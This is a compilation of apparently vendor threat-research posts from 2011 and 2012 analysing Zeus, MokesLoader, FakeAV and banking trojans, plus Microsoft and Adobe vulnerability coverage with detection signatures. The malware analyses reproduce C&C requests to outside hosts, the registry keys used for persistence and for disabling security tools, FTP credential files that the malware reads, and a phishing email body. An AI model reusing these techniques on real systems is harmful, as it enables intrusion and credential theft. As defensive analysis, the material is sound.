Zeus spam campaigns continue – Year 2012 (Jan 13, 2012)

/in /by

SonicWALL UTM Research team observed reports of multiple spam campaigns involving new variants of the Zeus Trojan. The most recent campaign involved emails pretending to be from US Department of Homeland Security’s CERT division, warning the user of a Phishing incident and contains a zipped attachment. The zipped attachment in the email is a newer variant of the Zeus Trojan.

Below is a sample of e-mail subjects and targeted organizations seen in these spam campaigns in the past week:

  • Phishing incident report call number: PH000000(Random Number)
    Spoofed: US Government- Computer Emergency Readiness Team

  • FDIC: About your business account (12 digit Alphanumeric)
    Spoofed: US Government- Federal Deposit Insurance Corporation

  • Your Billing Summary as of (DATE)
    Spoofed: Con Edison Inc.

  • DHL Parcel Tracking Notification (Random Number)
    Spoofed: DHL Courier service

SonicWALL Research team has received more than ten unique payloads in the past week from these campaigns. Zeus binaries found in the zipped attachments from these campaigns looks like:

screenshot

Upon execution, it performs following activities:

  • Checks if it is running in a virtual environment (VBOX, VMware, Virtual PC) and contains anti-debugging code to thwart analysis.

  • Drops the following files on the system and runs it:

    • (Application Data)feahulbofuiv.exe [Detected as GAV: Zbot.YW_163 (Trojan)]
    • (Temp)tmp242dfb15.bat [Deletes the original file and deletes itself]

  • Creates registry entry to ensure that the dropped file runs on system reboot.

  • Connects to a remote C&C server based in China and sends victim machine’s information:
     			POST /stone2012.php HTTP/1.1 			Host: plantlunch.ru 			..... 			bn1=XXXX&sk1=XXXXX 		 			POST /jinjer.php HTTP/1.1 			Host: viperheart.ru

SonicWALL Gateway AntiVirus provides proactive protection against these spam campaign via following signature:

  • GAV: Zbot.YMH (Trojan)
  • GAV: Zbot.YW_163 (Trojan)

screenshot

Microsoft Security Bulletin Coverage (Jan 10, 2012)

/in /by

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of January, 2012. A list of issues reported, along with SonicWALL coverage information follows:

MS12-001 Vulnerability in Windows Kernel Could Allow Security Feature Bypass (2644615)

  • CVE-2012-0001 Windows Kernel SafeSEH Bypass Vulnerability
    This is a local vulnerability.

MS12-002 Vulnerability in Windows Object Packager Could Allow Remote Code Execution (2603381)

  • CVE-2012-0009 Object Packager Insecure Executable Launching Vulnerability
    IPS: 3312 – Suspicious CIFS Traffic 17

MS12-003 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2646524)

  • CVE-2012-0005 CSRSS Elevation of Privilege Vulnerability
    This is a local vulnerability.

MS12-004 Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391)

  • CVE-2012-0003 MIDI Remote Code Execution Vulnerability
    IPS: 7274 – Suspicious Audio 1b
  • CVE-2012-0004 DirectShow Remote Code Execution Vulnerability
    There is no way to distinguish between normal and attack traffic.

MS12-005 Vulnerability in Microsoft Windows Could Allow Remote Code Execution (2584146)

  • CVE-2012-0013 Assembly Execution Vulnerability
    IPS: 7275 – Malformed PowerPoint Document 3b

MS12-006 Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)

  • CVE-2011-3389 SSL and TLS Protocols Vulnerability
    There is no way to distinguish between normal and attack traffic.

MS12-007 Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664)

  • CVE-2012-0007 AntiXSS Library Bypass Vulnerability
    IPS: 3357 – MS IE CSS Cross Domain Information Disclosure 2

DHL spam campaign leads to MokesLoader Trojan Downloader (Jan 06, 2012)

/in /by

SonicWALL UTM Research team observed a increase in spam campaigns employing DHL package delivery schemes. The emails pretending to be from DHL informs the user of a package being sent to their address and that the relevant tracking number is in the attachment. The zipped attachment in the email is a newer variant of the MokesLoader Trojan downloader.

Email subjects used in this spam campaign include:

  • DHL Delivery refuse
  • DHL Error package delivery
  • DHL shipment status No***
  • Error in the delivery address
  • Error in the delivery address No*******
  • Error package delivery
  • Get your parcel No***
  • Shipment Status No***
  • Track your parcel No******
  • Track your shipment No****

The body of the email is as shown below:

 ---------------------------------------------------------------------  Dear customer.     Your package has been sent to your address.    Please find a post label attached which contains a track number of    your package.     Thank you for your attention.    DHL Global Services.  ---------------------------------------------------------------------

The following file with a misleading icon is present in the zip attachment:

screenshot

It performs the following activities when executed:

  • It creates the following files:
    • %appdata%csrss.exe (Copy of itself) [Detected as GAV: “MokesLoader.MS (Trojan)]
    • %appdata%MicrosoftProtectqbfbv.xx
    • %appdata%MicrosoftProtectrpphtrt.nv

  • It reports new infection to a remote server using a uniquely generated login id:
    • GET /aaa/index.php?cmd=getload&login={removed}&sel=sp3ya&ver=5.1&bits=0&file=1&run=ok

  • It creates the following registry entries to ensure infection on reboot:
    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun Clients “%appdata%csrss.exe”
    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun mcoyr “rundll32 %appdata%MICROS~1Protectrpphtrt.nv, itgn”
    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun imfblgk “rundll32 %appdata%MICROS~1Protectqbfbv.xx, namn”

  • It creates a TCP backdoor on the infected machine
    screenshot

  • It reports backdoor port to remote server:
    • GET /aaa/index.php?cmd=getsocks&login={removed}&port=2592 HTTP/1.1

  • The following commands were used to communicate with remote server
    • getgrab
    • getproxy
    • getload
    • getsocks

  • It receives instructions from remote server and downloads additional malware.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: MokesLoader.MS (Trojan)
  • GAV: MokesLoader.MK (Trojan)
  • GAV: MokesLoader.LS (Trojan)
  • GAV: MokesLoader.LH (Trojan)
  • GAV: Dofoil.L#email (Trojan)

screenshot

IWS Remote Agent Module Design Weakness (Jan 5, 2012)

/in /by

InduSoft Web Studio (IWS) is a collection of automation tools that provide all the automation building blocks to develop HMIs (Human-Machine Interface), SCADA (Supervisory Control and Data Acquisition) systems and embedded instrumentation solutions. Typically a InduSoft Web Studio project is running on a embedded Windows device, which connects to machines, processors or other data-acquisition equipments. The embedded Windows device can connect to a Remote Agent component, which supports various message types in order to handle different tasks.

A design flaw exists in the Remote Agent component of InduSoft Web Studio. Specifically, the vulnerability is due to a lack of authentication when handling client requests. A remote attacker can exploit this vulnerability by sending a crafted message to the Remote Agent component. Successful exploitation can result in arbitrary file creation or code execution in the security context of the Remote Agent process.

The vulnerability has been assigned as CVE-2011-4051.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 7265 InduSoft Web Studio Remote Code Execution

Microsoft out-of-band Bulletin MS11-100 (Dec 30, 2011)

/in /by

Microsoft has released an out-of-band bulletin MS11-100 addressing four vulnerabilities on Dec 29th, 2011. The bulletin is rated by Microsoft as critical, and the vulnerabilities are listed as below:

  • Collisions in HashTable May Cause DoS Vulnerability – CVE-2011-3414
  • Insecure Redirect in .NET Form Authentication Vulnerability – CVE-2011-3415
  • ASP.Net Forms Authentication Bypass Vulnerability – CVE-2011-3416
  • ASP.NET Forms Authentication Ticket Caching Vulnerability – CVE-2011-3417

SonicWALL UTM team has researched these vulnerabilities at the same day and created a couple of IPS signatures to capture the attack traffic. Due to the nature of the vulnerabilities, it is hard to distinguish the legitimate traffic from the attack traffic for some of them. The following are the list of covered vulnerabilities and the IPS signatures.

  • Collisions in HashTable May Cause DoS Vulnerability – CVE-2011-3414
    • 7260 Microsoft .NET Framework Denial of Service
    • 7261 Microsoft .NET Framework Denial of Service 2
  • Insecure Redirect in .NET Form Authentication Vulnerability – CVE-2011-3415
    • 7262 ASP.NET Forms Authentication Redirect Vulnerability
  • ASP.Net Forms Authentication Bypass Vulnerability – CVE-2011-3416
    • 7263 ASP.NET Forms Authentication Bypass 1
    • 7264 ASP.NET Forms Authentication Bypass 2

For the Microsoft vulnerabilities covered by SonicWALL, please refer to SonicWALL MAPP for details.

American Arlines Ticket Spam – XP Home Security 2012 (Dec 22, 2011)

/in /by

The Sonicwall UTM research team discovered a new spam campaign spreading a well known FakeAV: XP Home Security 2012.

The Trojan spreads through email and arrives as a zipped email attachment purporting to be from American Airlines:

The Trojan uses the following icon in an attempt to masquerade as a harmless PDF file:

The Trojan performs the following DNS queries:

  • www.mortg{removed}.tv
  • www.google.com
  • refunados{removed}.ru
  • www.tria{removed}.org

The Trojan spawns and injects code into svchost.exe causing it to make the following HTTP GET request from a compromised remote webserver:

The Trojan downloads 1.exe, renames it to gio.exe and executes it. It uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:Documents and Settings{USER}Local SettingsApplication Datagio.exe [Detected as GAV: FakeAv.JICD (Trojan)]
  • C:Documents and Settings{USER}Application Datacsrss.exe [Detected as GAV: Bredo.T (Trojan)]
  • C:Documents and Settings{USER}Local SettingsApplication Data708j72l30qfte5ro4u62483b417elw [Detected as GAV: FakeAvCn.C (Trojan)]

The Trojan adds the following keys to the Windows registry:

  • HKEY_CLASSES_ROOTJ2shellopencommand “C:Documents and Settings{USER}Local SettingsApplication Datagio.exe” -a “%1” %*
  • HKEY_CLASSES_ROOT.exeshellopencommand “C:Documents and Settings{USER}Local SettingsApplication Datagio.exe” -a “%1” %*
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun “WinRAR SFX” “C:Documents and Settings{USER}Application Datacsrss.exe”
  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun “bieovju rundll32 C:DOCUME~1{USER}APPLIC~1MICROS~1Protectyxikrlc.n, dquc”

The Trojan deletes the following keys from the Windows registry to disable automatic updates:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_WUAUSER
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv

The Trojan runs gio.exe using the following command line:

      C:Documents and Settings{USER}Local SettingsApplication Datagio.exe" -dtm -a

The Trojan pops up the following FakeAV windows in an attempt to fool the user into buying the software:

The Trojan blocks certain applications from running such as Task Manager, and Internet Explorer:

The Trojan was observed opening the following files and directories:

      C:Program FilesCommon FilesIpswitchWS_FTP*.*0x00
      C:Documents and Settings{USER}Application DataIpswitchWS_FTPSites*.*
      C:Documents and SettingsAll UsersApplication DataFlashFXP3Sites.dat
      C:Documents and Settings{USER}Application DataFileZillasitemanager.xml
      C:Documents and Settings{USER}Application DataFileZillarecentservers.xml

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Bredo.T (Trojan)
  • GAV: FakeAv.JICD (Trojan)
  • GAV: FakeAvCn.C (Trojan)

Microsoft Publisher Memory Corruption (Dec 21, 2011)

/in /by

Microsoft Publisher is a document design application for print, web, and various other formats. Publisher is available individually or as part of the Microsoft Office suite. The default file extension for Publisher files is pub.

The Publisher file format specification is not publicly available. It does share some features with other Microsoft file formats. Publisher files are stored in the Microsoft Compound File meta-format which specifies a virtual filesystem encapsulated within a file. In a Compound Document, data is stored in streams within storages. Publisher data is known to reside in the Root EntryContents and Root EntryEscherEscherStm streams.

The streams appear in a common form, outlined in the following tables:

 Offset	Length		Description -------	---------------	-------------------------------- 0x0000	4		structure size (n) 0x0004	n-4		structure data

Structure data is composed of a variable number of consecutive fields, which have the following format:

 Offset	Length		Description -------	---------------	-------------------------------- 0x0000	2		index and type (two byte structure) 0x0002	4		size n (present based on type value) 0x0006	n-4		data

The size of the data field and the presence of the size field depend on the type. Types 16, 18, 20, 24, and 26, seem to indicate the presence of the size field, and in these cases, the data field begins at offset 0x0006. Types that do not indicate the presence of the size field have an implied size that is known to the application, and begin at offset 0x0002. Additionally, Publisher files are also known to contain OfficeArt records. Some OfficeArt records are specified by the host application, and can contain structures encoded in the above format. In particular, the OfficeArtClientAnchor record encodes data using this method.

A memory corruption vulnerability exists in Microsoft Publisher. The flaw is due to the way in which variable length fields are processed. The size field value is not validated, and used in the calculation of a pointer used to read the data field value.

A remote attacker can entice a target user to open a specially crafted Microsoft Publisher document to exploit this vulnerability. A successful exploitation attempt may result in arbitrary code execution. An unsuccessful attempt may crash the affected application. Exploiting this vulnerability for code execution is not a trivial task, however it is possible.

SonicWALL has released two IPS signatures to address known exploits targeting this vulnerability. The following signatures have been released:

  • 7227 – Malformed Publisher Document 4b
  • 7237 – MS Publisher Array Indexing Memory Corruption (MS11-091)

In addition to the specific signatures released to address this threat, SonicWALL has existing sets of IPS signatures which proactively detect and block widely used exploitation techniques that may be utilized in attacks against this particular vulnerability.

The vendor has released a security bulletin addressing this issue. The vulnerability has been assigned CVE-2011-3411 by mitre.

Banker.WXS infects bootloader and steals banking data (Dec 15, 2011)

/in /by

SonicWALL UTM Research team received reports of a new Banking trojan in the wild. This Banking trojan infects the Windows NT system’s NTLDR bootloader, the file that runs before the computer’s operating system. It also steals banking data and target files related to GBPlugin, a browser security plug-in used mostly by Brazilian Banks.

Source of this Trojan have been linked to spam email containing download links.

Once the user downloads and executes the trojan, it will do the following activities:

Downloads the file wxp.zip that contains the following:

  • xp-msantivirus
  • xp-msclean
  • ntldrv2
  • menu.lst
  • clean.bat

Makes a backup of systems ntldr as ntldr.old and replaces the original ntldr with ntldrv2 file.
The new ntldr file is a modified GRUB bootloader that runs the file menu.lst

The menu.lst is responsible for calling the files xp-msantivirus and xp-msclean during system’s reboot. These two files will later on remove files related to GBPlugin and other security softwares.

Files Created:

  • {Computer Name}12k12v3r1.exe – copy of banker trojan

Added Registry:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun {Computer Name} “Application Data{Computer Name}12k12v3r1.exe”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced EnableBalloonTips dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMapEscDomains

    • Disables User Account Controls notification by adding the following entries:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center UacDisableNotify dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem EnableLUA dword:00000000

    • Disables Windows Defender by replacing the data pointing to the file:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun Windows Defender VTNC

Deleted Registry:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMapDomains @ “”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMapRanges @ “”
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsZoneMapDomains @ “”
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsZoneMapRanges @ “”

After the installation, the system will be forced to reboot:

    screenshot

    Translation: “Windows Update is restarting your computer to install the critical security updates”

    screenshot
    Translation:

     Please wait while the operation is performed. Don't turn off or restart your computer.  ATTENTION: files were found infected with viruses on your computer .. Starting the process of removing viruses: Process started ... This process may take a while depending on the amount of virus-infected files found. Do not turn off or restart your computer during this process, wait for its completion,  your computer will be restarted automatically. Process completed successfully ... Restarting the computer.

    screenshot

    Translation: Booting Iniciando a Ferramenta de Remocao de Software Mal Intencionado da Microsoft

    screenshot

    Translation:

     Removal Tool Malicious Software  Do not turn off or unplug the machine until the completion of this process

During the system's reboot, the trojan removes the browser security plug-in GBPlugin and other security software that opens up the computer system for other malicious software. It tries to connect to other URLs to possibly download other malware. It also cleans up its track by deleting originally downloaded files.

Network Activity:

  • Remote Server: 50.1{REMOVED}59/.RECURSOS/

    • DNS Query:

  • smartp{REMOVED}yhoster.com
  • multip{REMOVED}omeze.com
  • arowhe{REMOVED}com
  • timbe{REMOVED}com
  • weigot{REMOVED}.com

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV: Banker.WXS (Trojan)

Adobe Reader and Acrobat Zero Day exploit (Dec 9, 2011)

/in /by

SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2011-2462) in Adobe Reader and Acrobat affecting Windows, Mac OS X, and Unix operating systems. This U3D memory corruption vulnerability (CVE-2011-2462) could lead to application crash, and may potentially allow the attacker to gain control of the victim machine. Adobe issued a security advisory on December 6, 2011 warning the users about this flaw.

SonicWALL UTM Research team got hold of a zero-day exploit for this vulnerability in the wild which is a specially crafted PDF file containing malicious encoded JavaScript and malicious U3D object. The exploit may arrive via e-mail or can be served via a malicious drive-by site.

A code snippet from decoded version of JavaScript that performs heap spray and drops a malicious executable file onto the target machine can be seen below:

screenshot

The malicious PDF file when opened performs the following activity on victim machine:

  • Encoded JavaScript uses heap spraying technique to crash the application and redirect to second document page as seen below.

    screenshot

    screenshot

  • It drops a backdoor Trojan on the target machine and runs it:
    • (USER)Local Settingspretty.exe — Detected as GAV: Wisp.A_2 (Trojan)
  • Creates a registry entry to ensure that the backdoor Trojan runs on system reboot:
    • HKCUSoftwareMicrosoftWindowsCurrentVersionRunoffice = “(USER)Local Settingspretty.exe”
  • The dropped backdoor Trojan will further attempt to connect to a remote server prettyli(REMOVED)com and sends following requests:
    • GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
    • GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122

SonicWALL UTM appliance provides protection against this threat via the following signatures:

  • GAV: CVE-2011-2462.A (Exploit)
  • IPS: Malformed PDF File 14b

Microsoft Security Bulletin Coverage (Dec 13, 2011)

/in /by

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of December, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-087 Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2639417)

  • CVE-2011-3402 TrueType Font Parsing Vulnerability
    GAV: Malformed.ttf.MP.1

MS11-088 Vulnerability in Microsoft Office IME (Chinese) Could Allow Elevation of Privilege (2652016)

  • CVE-2011-2010 Pinyin IME Elevation Vulnerability
    This is a local vulnerability.

MS11-089 Vulnerability in Microsoft Office Could Allow Remote Code Execution (2590602)

  • CVE-2011-1983 Word Use After Free Vulnerability
    GAV: Malformed.doc.MP.4

MS11-090 Cumulative Security Update of ActiveX Kill Bits (2618451)

  • CVE-2011-3397 Microsoft Time Remote Code Execution Vulnerability
    IPS: 7224 – MS IE Time Element Remote Code Execution 1
    IPS: 7225 – MS IE Time Element Remote Code Execution 2

MS11-091 Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution (2607702)

  • CVE-2011-1508 Publisher Function Pointer Overwrite Vulnerability
    No details available.
  • CVE-2011-3410 Publisher Out-of-bounds Array Index Vulnerability
    IPS: 7226 – Malformed Publisher Document 3b
  • CVE-2011-3411 Publisher Invalid Pointer Vulnerability
    IPS: 7227 – Malformed Publisher Document 4b
  • CVE-2011-3412 Publisher Memory Corruption Vulnerability
    IPS: 7228 – Malformed Publisher Document 5b

MS11-092 Vulnerability in Windows Media Could Allow Remote Code Execution (2648048)

  • CVE-2011-3401 Windows Media Player DVR-MS Memory Corruption Vulnerability
    GAV: MsApp.Exp.MP.2

MS11-093 Vulnerability in OLE Could Allow Remote Code Execution (2624667)

  • CVE-2011-3400 OLE Property Vulnerability
    IPS: 7230 – Malformed Visio Document 4b

MS11-094 Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (2639142)

  • CVE-2011-3396 PowerPoint Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1
    IPS: 1023 – Possible Binary Planting Attempt 2
    IPS: 6847 – Possible Binary Planting Attempt 3
  • CVE-2011-3413 OfficeArt Shape RCE Vulnerability
    GAV: Malformed.ppt.MP.2

MS11-095 Vulnerability in Active Directory Could Allow Remote Code Execution (2640045)

  • CVE-2011-3396 PowerPoint Insecure Library Loading Vulnerability
    It is not possible to distinguish attack from normal traffic.

MS11-096 Vulnerability in Microsoft Excel Could Allow Remote Code Execution (2640241)

  • CVE-2011-3403 Record Memory Corruption Vulnerability
    GAV: Malformed.xls.MP.11

MS11-097 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2620712)

  • CVE-2011-3408 CSRSS Local Privilege Elevation Vulnerability
    This is a local vulnerability.

MS11-098 Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2633171)

  • CVE-2011-2018 Windows Kernel Exception Handler Vulnerability
    This is a local vulnerability.

MS11-099 Cumulative Security Update for Internet Explorer (2618444)

  • CVE-2011-1992 XSS Filter Information Disclosure Vulnerability
    This is a cross domain vulnerability. It is not possible to distinguish attack from normal traffic.
  • CVE-2011-2019 Internet Explorer Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1
    IPS: 1023 – Possible Binary Planting Attempt 2
    IPS: 6847 – Possible Binary Planting Attempt 3
  • CVE-2011-3404 Content-Disposition Information Disclosure Vulnerability
    It is not possible to distinguish attack from normal traffic.